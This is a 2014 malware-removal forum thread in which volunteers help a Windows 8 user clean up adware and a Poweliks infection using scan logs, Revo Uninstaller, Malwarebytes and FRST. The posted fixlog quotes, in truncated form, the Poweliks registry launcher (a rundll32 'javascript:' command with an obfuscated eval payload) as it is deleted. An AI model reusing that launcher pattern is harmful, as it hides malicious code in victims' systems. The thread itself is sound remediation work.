20:47:18.0835 0x1e50  [ F1E067F56373F11EA4B785CAE823740A, 69BD30E64DA17595FF29C9C9FF9AD4F2F4BE29B688FBAC9DABB2FA9D13A47FF0 ] Power           C:\windows\system32\umpo.dll
20:47:18.0850 0x1e50  Power - ok
20:47:18.0944 0x1e50  [ 362D47E5B4D67270DE4B8606036F4ADD, 716E229C68D91AEA5B5629F60133D5CBDC0C95ABA54D9DC6264E923CAF4DC6C0 ] PptpMiniport    C:\windows\system32\DRIVERS\raspptp.sys
20:47:18.0944 0x1e50  PptpMiniport - ok
20:47:29.0094 0x1e50  wercplsupport - ok
20:47:29.0157 0x1e50  [ 5F70EBFC1F75B487DE79501E3CCBDB54, 2FCA57BF60A43B03BB42FBF22BBFC19AD2266FBBD818494AD114125E6E433321 ] WerSvc          C:\windows\System32\WerSvc.dll
20:47:29.0172 0x1e50  WerSvc - ok
20:47:29.0219 0x1e50  [ 44BB9C31E6242C4BD1CE7C2B440C2533, E603BB001028918B687818E930340008C752679B133037367A8A8E41DA559FFE ] WFPLWFS         C:\windows\system32\DRIVERS\wfplwfs.sys
20:47:29.0219 0x1e50  WFPLWFS - ok
20:47:29.0266 0x1e50  [ 60E0C220593DA4F7C289CB909D2DBAE0, 057CA7727F748600CC155043081AB9E3244763CF4913F317D13226A515F6FDB6 ] WiaRpc          C:\windows\System32\wiarpc.dll
20:47:29.0266 0x1e50  WiaRpc - ok
20:47:29.0313 0x1e50  [ A3C7624A42A3447EF5EDD1ED37FE4E60, BD8BDF0A571873FA8277878AF7AED11196CFF1B4DF1EA6BA13BD4887D7B63B94 ] WIMMount        C:\windows\system32\drivers\wimmount.sys
20:47:29.0328 0x1e50  WIMMount - ok
20:47:29.0359 0x1e50  WinDefend - ok
20:47:29.0484 0x1e50  [ 7911470B6018059A880469A63B65700A, 4B6131491A028FBCA54AC261112D183EFD42E98160545C8E8DFBDA01C87B3FB5 ] WinHttpAutoProxySvc C:\windows\system32\winhttp.dll
20:47:29.0500 0x1e50  WinHttpAutoProxySvc - ok
20:47:29.0593 0x1e50  [ 3D6B518B71C75C8FA4115A33615C107A, ED7A266013D29D3B1A462464735C3632BEA121D1B32553907AEAA0B00595C3DF ] Winmgmt         C:\windows\system32\wbem\WMIsvc.dll
20:47:29.0598 0x1e50  Winmgmt - ok
20:47:29.0757 0x1e50  [ 8E212A627F33F6FC3B5F3BB47212F66E, 9BBFE26ABFA14F346FE3711D13D959523EEA23608A33C16F3D750D66CA511911 ] WinRM           C:\windows\system32\WsmSvc.dll
20:47:29.0835 0x1e50  WinRM - ok
20:47:29.0929 0x1e50  [ BB20956C424531003F7FA6CD36F11D5D, 2C55F1C7553A527A7C4C34E730BE943269AE23928731C64D3DC945E07AE1771E ] WinUsb          C:\windows\system32\DRIVERS\WinUsb.sys
20:47:29.0929 0x1e50  WinUsb - ok
20:47:30.0022 0x1e50  [ 6351724B8FA0255C2DBD970297F00B93, A02F274479F9F32E30C75A5BD991B008B3CCB47D380D5870563EF918DAC5730E ] WlanSvc         C:\windows\System32\wlansvc.dll
20:47:30.0069 0x1e50  WlanSvc - ok
20:47:30.0209 0x1e50  [ B330CE47FB74A6BE9A3FFFF4B3F64D9B, B76226808406D8B38DE2D3A8CCE633BB507022C8BAAA6C3DAD34204CC6CE1284 ] wlidsvc         C:\windows\system32\wlidsvc.dll
20:47:30.0272 0x1e50  wlidsvc - ok
20:47:30.0303 0x1e50  [ E2A596CACFC6504306CDB7B593B90084, DF89CF57249553CE922C841F18B99A213185FA1099C053B9BB8C0F6E5BC3FEC0 ] WmiAcpi         C:\windows\System32\drivers\wmiacpi.sys
20:47:30.0303 0x1e50  WmiAcpi - ok
20:47:30.0365 0x1e50  [ D113499052C5E541906B727779F0F959, 05FB51086C0A0CE3812A7E6098C5A454ECCFE8553669CFA715153564F2226DB0 ] wmiApSrv        C:\windows\system32\wbem\WmiApSrv.exe
20:47:30.0365 0x1e50  wmiApSrv - ok
20:47:30.0397 0x1e50  WMPNetworkSvc - ok
20:47:30.0459 0x1e50  [ C6FF953D5D6F2EAE3B8883474D5076B3, 001CBB7FBC30209C892869258E5ABD3F0932886E156ECB10DCA599F6D32648BE ] wpcfltr         C:\windows\system32\DRIVERS\wpcfltr.sys
20:47:30.0459 0x1e50  wpcfltr - ok
20:47:30.0506 0x1e50  [ A6ED163169876BFD2437E872FE2F1509, C13E8676800EEEF690F51C4DEA660B36C8734AE2CCAAC48054E10D74B98949B8 ] WPCSvc          C:\windows\System32\wpcsvc.dll
20:47:30.0506 0x1e50  WPCSvc - ok
20:47:30.0568 0x1e50  [ 3013658A4D327854BEEC4A08D9655194, C4CF5AA6A47CC55E7037B0BFE20AE0A6442ADDC5DEB89D6861C98C61851FA821 ] WPDBusEnum      C:\windows\system32\wpdbusenum.dll
20:47:30.0568 0x1e50  WPDBusEnum - ok
20:47:30.0615 0x1e50  [ 0346CAFC181C91C6E2330332EB332ED6, D46F44C339399CAAE13CD71C53A169E95065208E07E5420DE00A4509D6CB056F ] WpdUpFltr       C:\windows\system32\drivers\WpdUpFltr.sys
20:47:30.0615 0x1e50  WpdUpFltr - ok
20:47:30.0677 0x1e50  [ BC8B5CB336E63BB25EAD1CE8EDD34B81, A42759956EDCCC6D0688240AA4F833FB9CA132D42D2D901CDCBB24DCE1788C1D ] ws2ifsl         C:\windows\system32\drivers\ws2ifsl.sys
20:47:30.0677 0x1e50  ws2ifsl - ok
20:47:30.0740 0x1e50  [ 012CFE7F0F95266F554EE3B91EE2128A, 866312F6BF7369BE686F1BA9F01311C99E95E268C6E63BE37C841F54F5AA0DB8 ] wscsvc          C:\windows\System32\wscsvc.dll
20:47:30.0740 0x1e50  wscsvc - ok
20:47:30.0771 0x1e50  [ 74EFDA0526862C3D8D01A776182798EA, 7C9AD6118CB344C63B60A8BA5FA8C85ADED30933821ABD1427857E826EFC2952 ] WSDPrintDevice  C:\windows\System32\drivers\WSDPrint.sys
20:47:30.0771 0x1e50  WSDPrintDevice - ok
20:47:30.0802 0x1e50  WSearch - ok
20:47:30.0943 0x1e50  [ D4D04839F3DFAF09D94BAB1016F7A297, 944A41D251F522EE87189C1D01CF7EEE2C70BF4353BA4005C44F03DB485F843F ] WSService       C:\windows\System32\WSService.dll
20:47:31.0005 0x1e50  WSService - ok
20:47:31.0177 0x1e50  [ 10EA2DBD2820A504D98D19F5EDAAFC04, 5B84D7C169CBAEBCE4A03BB89426E74DBF5AFCA1F8FDE2A5BC1006A8464D7E24 ] wuauserv        C:\windows\system32\wuaueng.dll
20:47:31.0270 0x1e50  wuauserv - ok
20:47:31.0317 0x1e50  [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf          C:\windows\system32\drivers\WudfPf.sys
20:47:31.0317 0x1e50  WudfPf - ok
20:47:31.0364 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd          C:\windows\System32\drivers\WUDFRd.sys
20:47:31.0364 0x1e50  WUDFRd - ok
20:47:31.0379 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFSensorLP    C:\windows\system32\DRIVERS\WUDFRd.sys
20:47:31.0395 0x1e50  WUDFSensorLP - ok
20:47:31.0442 0x1e50  [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc         C:\windows\System32\WUDFSvc.dll
20:47:31.0442 0x1e50  wudfsvc - ok
20:47:31.0473 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFWpdFs       C:\windows\system32\DRIVERS\WUDFRd.sys
20:47:31.0489 0x1e50  WUDFWpdFs - ok
20:47:31.0520 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFWpdMtp      C:\windows\system32\DRIVERS\WUDFRd.sys
20:47:31.0520 0x1e50  WUDFWpdMtp - ok
20:47:31.0603 0x1e50  [ 6D9E07436B6646EC8F7EFFD39B6BA288, 82C1CEA93ECEF17D221AD0F87C5BD96F3FD8143841C16BD9608BD4D58D90B8E0 ] WwanSvc         C:\windows\System32\wwansvc.dll
20:47:31.0618 0x1e50  WwanSvc - ok
20:47:31.0728 0x1e50  ================ Scan global ===============================
20:47:31.0759 0x1e50  [ DDC1AFBF9DDF880CE9BD3896114D8DED, E2406231EA4D2689A5EDFA9BD1A1BC064359D8D23B37F113A18B5EAE3E2D4050 ] C:\windows\system32\basesrv.dll
20:47:31.0806 0x1e50  [ E9343076AE704D20BB0D01F3AF3EFFEF, FF2CE4146945976F9480690505CECD3C7C719BAF0F633E6192C8272C75EF295D ] C:\windows\system32\winsrv.dll
20:47:31.0837 0x1e50  [ BD7C6949984D19AAA609896B675E7357, 5B46538B27BC70F5A3805AA63F6AACDC780C7168468FB535F2D35CF26B9DEE06 ] C:\windows\system32\sxssrv.dll
20:47:31.0899 0x1e50  [ 8F226143046435C75C033B0C52E90FFE, 54FA316485B57D7B8104FE621F5F40DEC35E3D57C3DF46B5F7EACF57445FE7CA ] C:\windows\system32\services.exe
20:47:31.0915 0x1e50  [ Global ] - ok
20:47:31.0915 0x1e50  ================ Scan MBR ==================================
20:47:31.0915 0x1e50  [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk0\DR0
20:47:31.0930 0x1e50  \Device\Harddisk0\DR0 - ok
20:47:31.0930 0x1e50  ================ Scan VBR ==================================
20:47:31.0930 0x1e50  [ 16D9BDA5561EE8FC3B41738A3E439747 ] \Device\Harddisk0\DR0\Partition1
20:47:31.0946 0x1e50  \Device\Harddisk0\DR0\Partition1 - ok
20:47:32.0024 0x1e50  [ 60CE4EFCEC10370B267155A72546F4E8 ] \Device\Harddisk0\DR0\Partition2
20:47:32.0024 0x1e50  \Device\Harddisk0\DR0\Partition2 - ok
20:47:32.0055 0x1e50  [ F7769F4DFE9FA09660B5AD1485218409 ] \Device\Harddisk0\DR0\Partition3
20:47:32.0071 0x1e50  \Device\Harddisk0\DR0\Partition3 - ok
20:47:32.0071 0x1e50  [ 380873D9693A091881F63A558F86709C ] \Device\Harddisk0\DR0\Partition4
20:47:32.0086 0x1e50  \Device\Harddisk0\DR0\Partition4 - ok
20:47:32.0118 0x1e50  [ EDA8B861449A681919BE6C207F47B7D4 ] \Device\Harddisk0\DR0\Partition5
20:47:32.0118 0x1e50  \Device\Harddisk0\DR0\Partition5 - ok
20:47:32.0133 0x1e50  ================ Scan generic autorun ======================
20:47:32.0211 0x1e50  [ 2D7816ACDA1CC85C873CBC19A4121D58, 3F3E41EBEF81DB8C2A84A8E75D1E4852046A10A5DCB8CCCC2ADF7FD0DC8EEF66 ] C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe
20:47:32.0242 0x1e50  ToshibaAppPlace - ok
20:47:32.0320 0x1e50  [ 38161F642AA7A2882914DDB0E90FF41C, 76236F618A6646BFD286641543E068285B71169FBF44381BB7EE6396EA67EC24 ] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
20:47:32.0352 0x1e50  StartCCC - ok
20:47:32.0617 0x1e50  [ 361B0893A5C6741F347568A3232D2822, A1085FD8DCEA67E3760C5204C4FC0EADAAC2A9E3A1A498B0BE2F0883EE2B1A04 ] C:\Program Files (x86)\AVG\AVG2014\avgui.exe
20:47:32.0742 0x1e50  AVG_UI - ok
20:47:32.0835 0x1e50  [ 94A4D6915D4F572309DF6137E1846528, E46BDF83CAA6683AA655DBA3D2C8DC7AC06251E952466A20CFDA3A16B1840455 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
20:47:32.0835 0x1e50  APSDaemon - ok
20:47:32.0913 0x1e50  [ D9FAA5EFEB27DDBE99C720B9069A451E, FD33757E2674915409E54FBDF828DB900E31B99265035B16C216B38C6DBFC15F ] C:\Program Files (x86)\iTunes\iTunesHelper.exe
20:47:32.0913 0x1e50  iTunesHelper - ok
20:47:32.0913 0x1e50  GamingWonderland EPM Support - ok
20:47:33.0007 0x1e50  [ 5183EC20A788D7A78C7B408FDEA6F303, E93956ED56889FC0EA736A1787CF44CE09D21022B12DBDCD47A754EAB5A1A797 ] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe
20:47:33.0038 0x1e50  Nikon Message Center 2 - ok
20:47:33.0272 0x1e50  [ F7F0714EF964652CAF1CA177722AC6DD, 06C8F8AC796F218473BA002A21AD947B13BE5E235CBAC684B209FA6E8C2DC2DE ] c:\program files (x86)\emsisoft anti-malware\a2guard.exe
20:47:33.0412 0x1e50  emsisoft anti-malware - ok
20:47:33.0412 0x1e50  Waiting for KSN requests completion. In queue: 112
20:47:34.0431 0x1e50  Waiting for KSN requests completion. In queue: 112
20:47:35.0445 0x1e50  Waiting for KSN requests completion. In queue: 112
20:47:36.0496 0x1e50  AV detected via SS2: AVG AntiVirus Free Edition 2014, C:\Program Files (x86)\AVG\AVG2014\avgwsc.exe ( 14.0.0.4765 ), 0x41000 ( enabled : updated )
20:47:36.0496 0x1e50  AV detected via SS2: Emsisoft Anti-Malware, C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2start.exe ( 9.0.0.4570 ), 0x41000 ( enabled : updated )
20:47:36.0527 0x1e50  AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.5.218.0 ), 0x60100 ( disabled : updated )
20:47:36.0542 0x1e50  Win FW state via NFP2: enabled
20:47:39.0126 0x1e50  ============================================================
20:47:39.0126 0x1e50  Scan finished
20:47:39.0126 0x1e50  ============================================================
20:47:39.0126 0x203c  Detected object count: 0
20:47:39.0126 0x203c  Actual detected object count: 0

Thanks for looking at this stuff.



#6 TB-Psychotic

  • Malware Response Team

Posted 16 October 2014 - 09:43 AM

We need to remove some programs with Revo Uninstaller Free:


Note: Revo Uninstaller is more thorough in deleting programs on your computer than using the Add/Remove option in Windows. Since it is a more powerful tool, please be sure to follow the instructions carefully.
Note: If the program you want to uninstall is not listed by Revo, let me know and we will try an alternate method of removal.

  • Please download and install Revo Uninstaller Free
    note: there is no need to click anything on that page, the download will start automatically
  • Double click Revo Uninstaller to run it
  • From the list of programs double click on the listed program(s), or anything similar, to remove it:
    GamingWonderland Internet Explorer Toolbar
    7-zip v9.20
    
  • When prompted if you want to uninstall click Yes
  • Be sure the Moderate option is selected then click Next
  • The program will run. If prompted again, click Yes
  • When the built-in uninstaller is finished click on Next
  • Once the program has searched for leftovers click Next
  • Check the items in bold only on the list then click Delete
    note: you may have to expand some folders by clicking the "+" mark
  • When prompted click on Yes and then on Next
  • Put a check on any folders that are found and select Delete
  • When prompted select Yes then Next
  • Once done click Finish

 

 

 

 

Full System Scan with Malwarebytes Antimalware
 

  • If not existing, please download Malwarebytes Anti-Malware to your desktop.
  • Double-click the downloaded setup file and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.

If the program is already installed:

  • Run Malwarebytes Antimalware
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.

  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 


#7 JeremyAndrew

  • Topic Starter

Posted 16 October 2014 - 06:18 PM

Thanks for the help.  It says there are no threats. 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/16/2014
Scan Time: 1:32:19 PM
Logfile: 
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.10.16.06
Rootkit Database: v2014.10.15.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 8
CPU: x64
File System: NTFS
User: Jeremy and Heidi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 337370
Time Elapsed: 14 min, 34 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


#8 TB-Psychotic

  • Malware Response Team

Posted 17 October 2014 - 03:05 AM

What about the fixlog?



#9 JeremyAndrew

  • Topic Starter

Posted 17 October 2014 - 05:57 PM

I'm afraid I didn't understand about the fixlog.  In looking at it I don't understand the abbreviations for the paths, except for  the HKU S-1-5-21 entries.  And then do I just delete the settings you noted?



#10 TB-Psychotic

  • Malware Response Team

Posted 21 October 2014 - 06:46 AM

Clearly my mistake - I forgot a part of my instruction...! :(

Sorry for that.

 

Fix with FRST (normal mode)

WARNING: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.
 

  • Download the attached fixlist.txt and save it to the location where FRST is saved to.
  • Run FRST.exe (on 64bit, run FRST64.exe) and press the Fix button just once and wait.
  • The tool will make a log (Fixlog.txt) which you find where you saved FRST. Please post it to your reply.

 

 

Full System Scan with Malwarebytes Antimalware

  • If not existing, please download Malwarebytes Anti-Malware to your desktop.
  • Double-click the downloaded setup file and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:

    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.

  • Click Finish.


If the program is already installed:
  • Run Malwarebytes Antimalware
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.


  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.


#11 JeremyAndrew

  • Topic Starter

Posted 23 October 2014 - 02:23 PM

Thank you.  Here are the logs:

FRST:

(I am sorry, I got impatient and deleted the registry keys that had the java .exe file.  But FRST deleted the entire key that it was part of, so that should be OK)

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-10-2014
Ran by Jeremy and Heidi at 2014-10-21 10:53:34 Run:1
Running from C:\FRST
Loaded Profile: Jeremy and Heidi (Available profiles: Jeremy and Heidi)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CustomCLSID: HKU\S-1-5-21-3754358886-4043612072-4009104627-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X]
BHO-x32: Toolbar BHO -> {7c8f8fe5-9785-4f74-bcf8-895ef9752d97} -> C:\PROGRA~2\GAMING~2\bar\1.bin\gtbar.dll No File
SearchScopes: HKCU - {31090377-0740-419E-BEFC-A56E50500D5B} URL = 
SearchScopes: HKCU - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = 
SearchScopes: HKLM - {31090377-0740-419E-BEFC-A56E50500D5B} URL = http://speedial.com/results.php?f=4&q={searchTerms}&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll File Not Found
HKLM-x32\...\Run: [GamingWonderland EPM Support] => "C:\PROGRA~2\GAMING~2\bar\1.bin\gtmedint.exe" T8EPMSUP.DLL,S

C:\PROGRA~2\GAMING~2

EmptyTemp:
*****************

"HKU\S-1-5-21-3754358886-4043612072-4009104627-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key Deleted Successfully.
COMSysApp => Service deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7c8f8fe5-9785-4f74-bcf8-895ef9752d97}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{7c8f8fe5-9785-4f74-bcf8-895ef9752d97}" => Key deleted successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key deleted successfully.
"HKCR\CLSID\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C043058C-5F2C-4C42-AB2F-8787D95BF238}" => Key deleted successfully.
"HKCR\CLSID\{C043058C-5F2C-4C42-AB2F-8787D95BF238}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key deleted successfully.
"HKCR\CLSID\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key not found.
"HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll" => Value Data removed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\GamingWonderland EPM Support => value deleted successfully.
"C:\PROGRA~2\GAMING~2" => File/Directory not found.
EmptyTemp: => Removed 2.1 GB temporary data.


The system needed a reboot. 

==== End of Fixlog ====

Malbytes:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/21/2014
Scan Time: 3:48:12 PM
Logfile: 
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.10.21.11
Rootkit Database: v2014.10.21.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 8
CPU: x64
File System: NTFS
User: Jeremy and Heidi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 317053
Time Elapsed: 23 min, 54 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


#12 schrauber

  • Malware Response Team

Posted 29 October 2014 - 02:58 AM

Hi JeremyAndrew,

Marius is not available at the moment, so I will work with you from now on. Please post back with a fresh FRST logfile and tell me how the system is running.
regards,
schrauber


If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!


#13 JeremyAndrew

  • Topic Starter

Posted 01 November 2014 - 11:06 AM

Hi.  Powershell stopped crashing all the time.  Still have a lot of corrupted windows files - can't open Windows store, can't print from Internet Explorer, can't update to newer browser, etc.  But these are residual damage, I think.  I don't think anything bad is running anymore.

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 01-11-2014
Ran by Jeremy and Heidi (administrator) on TOSHIBA_LAPTOP on 01-11-2014 08:57:13
Running from C:\Users\Jeremy and Heidi\Downloads
Loaded Profile: Jeremy and Heidi (Available profiles: Jeremy and Heidi)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Hotkey\TCrdMain_Win8.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoResident.exe
(TOSHIBA Corporation) C:\Program Files (x86)\Toshiba\System Setting\TSleepSrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\ToshibaServiceStation.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHWMsg.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\TMachInfo.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12936848 2012-07-13] (Realtek Semiconductor)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170784 2012-07-27] (SRS Labs, Inc.)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2608040 2012-08-13] (TOSHIBA Corporation)
